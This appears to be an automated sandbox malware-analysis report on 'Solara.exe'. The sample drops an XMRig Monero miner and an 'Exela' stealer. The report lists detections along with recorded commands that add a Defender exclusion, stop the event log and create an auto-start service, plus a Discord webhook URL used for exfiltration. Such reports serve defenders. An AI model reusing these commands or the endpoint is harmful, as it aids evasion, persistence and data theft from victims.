                Source: Process startedAuthor: frack113, Nasreddine Bencherchali: Data: Command: "C:\Users\user~1\AppData\Local\Temp\Solara.exe" , CommandLine: "C:\Users\user~1\AppData\Local\Temp\Solara.exe" , CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Local\Temp\Solara.exe, NewProcessName: C:\Users\user\AppData\Local\Temp\Solara.exe, OriginalFileName: C:\Users\user\AppData\Local\Temp\Solara.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 5852, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Users\user~1\AppData\Local\Temp\Solara.exe" , ProcessId: 2044, ProcessName: Solara.exe
                Sigma detected: New Service Creation Using Sc.EXE
                Source: Process startedAuthor: Timur Zinniatullin, Daniil Yugoslavskiy, oscd.community: Data: Command: C:\Windows\system32\sc.exe create "PGYNROQK" binpath= "C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe" start= "auto", CommandLine: C:\Windows\system32\sc.exe create "PGYNROQK" binpath= "C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe" start= "auto", CommandLine|base64offset|contains: r, Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Solara.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solara.exe, ParentProcessId: 2044, ParentProcessName: Solara.exe, ProcessCommandLine: C:\Windows\system32\sc.exe create "PGYNROQK" binpath= "C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exe" start= "auto", ProcessId: 4304, ProcessName: sc.exe
                Sigma detected: Non Interactive PowerShell Process Spawned
                Source: Process startedAuthor: Roberto Rodriguez @Cyb3rWard0g (rule), oscd.community (improvements): Data: Command: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', CommandLine|base64offset|contains: L^rbs'2, Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, NewProcessName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, OriginalFileName: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe, ParentCommandLine: "C:\Users\user\Desktop\Solara.exe", ParentImage: C:\Users\user\Desktop\Solara.exe, ParentProcessId: 5852, ParentProcessName: Solara.exe, ProcessCommandLine: "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -ExecutionPolicy Bypass Add-MpPreference -ExclusionPath 'C:\Users\user\AppData\Local\Temp\Solara.exe', ProcessId: 1512, ProcessName: powershell.exe
                Sigma detected: Windows Processes Suspicious Parent Directory
                Source: Process startedAuthor: vburov: Data: Command: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc, CommandLine: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc, CommandLine|base64offset|contains: , Image: C:\Windows\System32\svchost.exe, NewProcessName: C:\Windows\System32\svchost.exe, OriginalFileName: C:\Windows\System32\svchost.exe, ParentCommandLine: , ParentImage: , ParentProcessId: 624, ProcessCommandLine: C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted -p -s wscsvc, ProcessId: 6648, ProcessName: svchost.exe

                HIPS / PFW / Operating System Protection Evasion

                barindex
                Sigma detected: Stop EventLog
                Source: Process startedAuthor: Joe Security: Data: Command: C:\Windows\system32\sc.exe stop eventlog, CommandLine: C:\Windows\system32\sc.exe stop eventlog, CommandLine|base64offset|contains: ), Image: C:\Windows\System32\sc.exe, NewProcessName: C:\Windows\System32\sc.exe, OriginalFileName: C:\Windows\System32\sc.exe, ParentCommandLine: "C:\Users\user~1\AppData\Local\Temp\Solara.exe" , ParentImage: C:\Users\user\AppData\Local\Temp\Solara.exe, ParentProcessId: 2044, ParentProcessName: Solara.exe, ProcessCommandLine: C:\Windows\system32\sc.exe stop eventlog, ProcessId: 4864, ProcessName: sc.exe

                Suricata Signatures

                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-12T07:10:50.120905+010020362892Crypto Currency Mining Activity Detected192.168.2.7622301.1.1.153UDP
                TimestampSIDSeverityClasstypeSource IPSource PortDestination IPDestination PortProtocol
                2025-01-12T07:10:24.458989+010028269302Crypto Currency Mining Activity Detected192.168.2.74985780.240.16.67443TCP

                Joe Sandbox Signatures

                Click to jump to signature section

                Show All Signature Results

                AV Detection

                barindex
                Antivirus / Scanner detection for submitted sample
                Source: Solara.exeAvira: detected
                Antivirus detection for dropped file
                Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exeAvira: detection malicious, Label: HEUR/AGEN.1306040
                Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exeAvira: detection malicious, Label: HEUR/AGEN.1306040
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeAvira: detection malicious, Label: HEUR/AGEN.1306040
                Multi AV Scanner detection for dropped file
                Source: C:\ProgramData\Microsoft\Windows\Start Menu\Programs\StartUp\Exela.exeReversingLabs: Detection: 47%
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeReversingLabs: Detection: 82%
                Source: C:\Users\user\AppData\Local\ExelaUpdateService\Exela.exeReversingLabs: Detection: 47%
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeReversingLabs: Detection: 47%
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeReversingLabs: Detection: 82%
                Multi AV Scanner detection for submitted file
                Source: Solara.exeReversingLabs: Detection: 71%
                AI detected suspicious sample
                Source: Submited SampleIntegrated Neural Analysis Model: Matched 99.8% probability
                Machine Learning detection for sample
                Source: Solara.exeJoe Sandbox ML: detected

                Bitcoin Miner

                barindex
                Yara detected Xmrig cryptocurrency miner
                Source: Yara matchFile source: sslproxydump.pcap, type: PCAP
                Source: Yara matchFile source: 66.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPE
                Source: Yara matchFile source: 00000042.00000002.2596176431.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORY
                Found strings related to Crypto-Mining
                Source: conhost.exeString found in binary or memory: cryptonight-monerov7
                Source: Solara.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: Solara.exeStatic PE information: DYNAMIC_BASE, NX_COMPAT, NO_SEH, TERMINAL_SERVER_AWARE
                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /Gs0 /GF /Gy /MD /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -DOPENSSL_CPUID_OBJ -DOPENSSL_IA32_SSE2 -DOPENSSL_BN_ASM_MONT -DOPENSSL_BN_ASM_MONT5 -DOPENSSL_BN_ASM_GF2m -DSHA1_ASM -DSHA256_ASM -DSHA512_ASM -DKECCAK1600_A source: Exela.exe
                Source: Binary string: compiler: cl /Zi /Fdossl_static.pdb /MT /Zl /Gs0 /GF /Gy /W3 /wd4090 /nologo /O2 -DL_ENDIAN -DOPENSSL_PIC -D"OPENSSL_BUILDING_OPENSSL" -D"OPENSSL_SYS_WIN32" -D"WIN32_LEAN_AND_MEAN" -D"UNICODE" -D"_UNICODE" -D"_CRT_SECURE_NO_DEPRECATE" -D"_WINSOCK_DEPRECATED_N source: Exela.exe
                Source: Binary string: D:\_w\1\b\libcrypto-1_1.pdb source: Exela.exe
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE983B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,76_2_00007FF75AE983B0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE992F0 FindFirstFileExW,FindClose,76_2_00007FF75AE992F0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB18E4 _invalid_parameter_noinfo,FindFirstFileExW,FindNextFileW,FindClose,FindClose,76_2_00007FF75AEB18E4
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FF75AE992F0 FindFirstFileExW,FindClose,77_2_00007FF75AE992F0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FF75AE983B0 FindFirstFileW,RemoveDirectoryW,DeleteFileW,FindNextFileW,FindClose,RemoveDirectoryW,77_2_00007FF75AE983B0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\images
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\html
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\css
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile opened: C:\Users\user\AppData\Local\Google\Chrome\User Data\Default\Extensions\nmmhkkegccagdldgiimedpiccmgmieda\1.0.0.6_0\_locales
                Source: Joe Sandbox ViewIP Address: 208.95.112.1 208.95.112.1
                Source: unknownDNS query: name: ip-api.com
                Source: Network trafficSuricata IDS: 2036289 - Severity 2 - ET COINMINER CoinMiner Domain in DNS Lookup (pool .hashvault .pro) : 192.168.2.7:62230 -> 1.1.1.1:53
                Source: Network trafficSuricata IDS: 2826930 - Severity 2 - ETPRO COINMINER XMR CoinMiner Usage : 192.168.2.7:49857 -> 80.240.16.67:443
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: unknownUDP traffic detected without corresponding DNS query: 1.1.1.1
                Source: global trafficHTTP traffic detected: GET /getServer HTTP/1.1Host: api.gofile.ioAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.10 aiohttp/3.11.11
                Source: global trafficHTTP traffic detected: GET /json HTTP/1.1Host: ip-api.comAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.10 aiohttp/3.11.11
                Source: global trafficDNS traffic detected: DNS query: pool.hashvault.pro
                Source: global trafficDNS traffic detected: DNS query: ip-api.com
                Source: global trafficDNS traffic detected: DNS query: discordapp.com
                Source: global trafficDNS traffic detected: DNS query: api.gofile.io
                Source: global trafficDNS traffic detected: DNS query: store1.gofile.io
                Source: unknownHTTP traffic detected: POST /api/webhooks/1320429670621118475/ZA2SDlHOyGg_8gIHOPb_StHSHJUvDXjQVsMohQrFJXzcZqXUB4PdHnGLRGgaGXchQyP9 HTTP/1.1Host: discordapp.comContent-Type: application/jsonAccept: */*Accept-Encoding: gzip, deflateUser-Agent: Python/3.10 aiohttp/3.11.11Content-Length: 1379
                Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.27.1Date: Sun, 12 Jan 2025 06:11:31 GMTContent-Type: text/html; charset=utf-8Content-Length: 14Connection: closeAccess-Control-Allow-Origin: *Access-Control-Allow-Headers: Content-Type, AuthorizationAccess-Control-Allow-Methods: GET, POST, OPTIONS, PUT, DELETE, HEADAccess-Control-Allow-Credentials: trueContent-Security-Policy: default-src 'self';base-uri 'self';font-src 'self' https: data:;form-action 'self';frame-ancestors 'self';img-src 'self' data:;object-src 'none';script-src 'self';script-src-attr 'none';style-src 'self' https: 'unsafe-inline';upgrade-insecure-requestsCross-Origin-Embedder-Policy: require-corpCross-Origin-Opener-Policy: same-originCross-Origin-Resource-Policy: cross-originOrigin-Agent-Cluster: ?1Referrer-Policy: no-referrerStrict-Transport-Security: max-age=15552000; includeSubDomainsX-Content-Type-Options: nosniffX-DNS-Prefetch-Control: offX-Download-Options: noopenX-Frame-Options: SAMEORIGINX-Permitted-Cross-Domain-Policies: noneX-XSS-Protection: 0ETag: W/"e-18wLxDNka2j9cTg7gpgujtuBb1A"X-Robots-Tag: noindex, nofollow
                Source: powershell.exe, 00000003.00000002.1458447080.000001F9EFBD2000.00000004.00000020.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1674670295.0000025669D25000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.m
                Source: powershell.exe, 00000008.00000002.1694379843.000002566BD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.mic
                Source: powershell.exe, 00000008.00000002.1694379843.000002566BD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.micft.cMicRosof
                Source: powershell.exe, 00000003.00000002.1440404382.000001F990071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://nuget.org/NuGet.exe
                Source: powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://pesterbdd.com/images/Pester.png
                Source: powershell.exe, 00000003.00000002.1405932041.000001F980229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/soap/encoding/
                Source: powershell.exe, 00000003.00000002.1405932041.000001F980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name
                Source: powershell.exe, 00000003.00000002.1405932041.000001F980229000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://schemas.xmlsoap.org/wsdl/
                Source: powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://www.apache.org/licenses/LICENSE-2.0.html
                Source: powershell.exe, 00000008.00000002.1694379843.000002566BD66000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://www.microsoft.co
                Source: powershell.exe, 00000003.00000002.1405932041.000001F980001000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1510441641.0000025600001000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://aka.ms/pscore68
                Source: powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/
                Source: powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/Icon
                Source: powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://contoso.com/License
                Source: Exela.exeString found in binary or memory: https://cryptography.io/en/latest/faq/#why-can-t-i-import-my-pem-file
                Source: powershell.exe, 00000008.00000002.1510441641.0000025600228000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://github.com/Pester/Pester
                Source: Exela.exeString found in binary or memory: https://github.com/pyca/cryptography/issues
                Source: Exela.exeString found in binary or memory: https://github.com/pyca/cryptography/issues/8996
                Source: Exela.exeString found in binary or memory: https://github.com/pyca/cryptography/issues/9253
                Source: powershell.exe, 00000003.00000002.1440404382.000001F990071000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000008.00000002.1638195796.000002561006E000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: https://nuget.org/nuget.exe
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49985
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49984
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49983
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49992
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49991
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49990
                Source: unknownNetwork traffic detected: HTTP traffic on port 49857 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49985 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49984 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49983 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49990 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49991 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 49992 -> 443
                Source: unknownNetwork traffic detected: HTTP traffic on port 443 -> 49857

                Spam, unwanted Advertisements and Ransom Demands

                barindex
                Modifies existing user documents (likely ransomware behavior)
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\LIJDSFKJZG.xlsx
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\LIJDSFKJZG.xlsx
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\AQRFEVRTGL.xlsx
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\AQRFEVRTGL.xlsx
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeFile deleted: C:\Users\user\AppData\Local\Temp\StealedFilesByExela\Desktop\HMPPSXQPQV.pdf

                System Summary

                barindex
                Malicious sample detected (through community Yara rule)
                Source: 66.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Source: 66.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects Monero Crypto Coin Miner Author: Florian Roth
                Source: 66.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: Detects coinmining malware Author: ditekSHen
                Source: 00000042.00000002.2596176431.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 Author: unknown
                Uses powercfg.exe to modify the power settings
                Source: C:\Users\user\AppData\Local\Temp\Solara.exeProcess created: C:\Windows\System32\powercfg.exe C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                Writes or reads registry keys via WMI
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeWMI Queries: IWbemServices::ExecMethod - root\default : StdRegProv::GetStringValue
                Source: C:\Windows\System32\conhost.exeCode function: 64_2_0000000140001394 NtOpenSection,64_2_0000000140001394
                Source: C:\ProgramData\hoyktorfcbbz\rdqanwpudvuj.exeFile created: C:\Windows\TEMP\ypynqohyxqjk.sys
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeFile deleted: C:\Windows\Temp\__PSScriptPolicyTest_2244occl.ell.ps1
                Source: C:\Users\user\Desktop\Solara.exeCode function: 1_2_00007FFAAC340A211_2_00007FFAAC340A21
                Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeCode function: 8_2_00007FFAAC4230E98_2_00007FFAAC4230E9
                Source: C:\Windows\System32\conhost.exeCode function: 64_2_000000014000324064_2_0000000140003240
                Source: C:\Windows\System32\conhost.exeCode function: 64_2_00000001400027D064_2_00000001400027D0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE98BD076_2_00007FF75AE98BD0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB5C7076_2_00007FF75AEB5C70
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB69D476_2_00007FF75AEB69D4
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB093876_2_00007FF75AEB0938
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE9100076_2_00007FF75AE91000
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEA1BC076_2_00007FF75AEA1BC0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE9A34B76_2_00007FF75AE9A34B
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE9A4E476_2_00007FF75AE9A4E4
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB093876_2_00007FF75AEB0938
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB648876_2_00007FF75AEB6488
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEA2C8076_2_00007FF75AEA2C80
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB3C8076_2_00007FF75AEB3C80
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEA3A1476_2_00007FF75AEA3A14
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEA21D476_2_00007FF75AEA21D4
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEA19B476_2_00007FF75AEA19B4
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEA815476_2_00007FF75AEA8154
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB411C76_2_00007FF75AEB411C
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEADACC76_2_00007FF75AEADACC
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEA880476_2_00007FF75AEA8804
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEA1FD076_2_00007FF75AEA1FD0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEA17B076_2_00007FF75AEA17B0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB979876_2_00007FF75AEB9798
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEADF6076_2_00007FF75AEADF60
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB18E476_2_00007FF75AEB18E4
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE9987076_2_00007FF75AE99870
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEA361076_2_00007FF75AEA3610
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEAE5E076_2_00007FF75AEAE5E0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEA1DC476_2_00007FF75AEA1DC4
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEA5DA076_2_00007FF75AEA5DA0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AE9AD1D76_2_00007FF75AE9AD1D
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEA9F1076_2_00007FF75AEA9F10
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 76_2_00007FF75AEB5EEC76_2_00007FF75AEB5EEC
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FF75AE9A34B77_2_00007FF75AE9A34B
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FF75AEB69D477_2_00007FF75AEB69D4
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FF75AE9100077_2_00007FF75AE91000
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FF75AE98BD077_2_00007FF75AE98BD0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FF75AEA1BC077_2_00007FF75AEA1BC0
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB0803188077_2_00007FFB08031880
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB084A323077_2_00007FFB084A3230
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB081511CC77_2_00007FFB081511CC
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08154C1477_2_00007FFB08154C14
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08304A1077_2_00007FFB08304A10
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08152FCC77_2_00007FFB08152FCC
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08154A5477_2_00007FFB08154A54
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB081526E977_2_00007FFB081526E9
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB0815592F77_2_00007FFB0815592F
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB0815114077_2_00007FFB08151140
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB081522FC77_2_00007FFB081522FC
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB0815121777_2_00007FFB08151217
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB081510AA77_2_00007FFB081510AA
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB0815362F77_2_00007FFB0815362F
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB0815659B77_2_00007FFB0815659B
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB08151F9677_2_00007FFB08151F96
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: 77_2_00007FFB0815440377_2_00007FFB08154403
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: String function: 00007FFB08152734 appears 36 times
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: String function: 00007FF75AE92710 appears 84 times
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: String function: 00007FFB08154057 appears 59 times
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: String function: 00007FFB08151EF1 appears 182 times
                Source: C:\Users\user\AppData\Local\Temp\Exela.exeCode function: String function: 00007FFB08152A04 appears 41 times
                Source: _overlapped.pyd.76.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: unicodedata.pyd.76.drStatic PE information: Resource name: RT_VERSION type: COM executable for DOS
                Source: python3.dll.76.drStatic PE information: No import functions for PE file found
                Source: Solara.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
                Source: 66.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: 66.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MAL_XMR_Miner_May19_1 date = 2019-05-31, author = Florian Roth, description = Detects Monero Crypto Coin Miner, score = d6df423efb576f167bc28b3c08d10c397007ba323a0de92d1e504a3f490752fc, reference = https://www.guardicore.com/2019/05/nansh0u-campaign-hackers-arsenal-grows-stronger/
                Source: 66.2.conhost.exe.140000000.0.unpack, type: UNPACKEDPEMatched rule: MALWARE_Win_CoinMiner02 author = ditekSHen, description = Detects coinmining malware
                Source: 00000042.00000002.2596176431.0000000140001000.00000040.00000001.00020000.00000000.sdmp, type: MEMORYMatched rule: MacOS_Cryptominer_Xmrig_241780a1 reference_sample = 2e94fa6ac4045292bf04070a372a03df804fa96c3b0cb4ac637eeeb67531a32f, os = macos, severity = x86, creation_date = 2021-09-30, scan_context = file, memory, license = Elastic License v2, threat_name = MacOS.Cryptominer.Xmrig, fingerprint = be9c56f18e0f0bdc8c46544039b9cb0bbba595c1912d089b2bcc7a7768ac04a8, id = 241780a1-ad50-4ded-b85a-26339ae5a632, last_modified = 2021-10-25
                Source: libcrypto-1_1.dll.76.drStatic PE information: Section: UPX1 ZLIB complexity 0.9987754672181373
                Source: libssl-1_1.dll.76.drStatic PE information: Section: UPX1 ZLIB complexity 0.9903915229885057
                Source: python310.dll.76.drStatic PE information: Section: UPX1 ZLIB complexity 0.9989695677157001
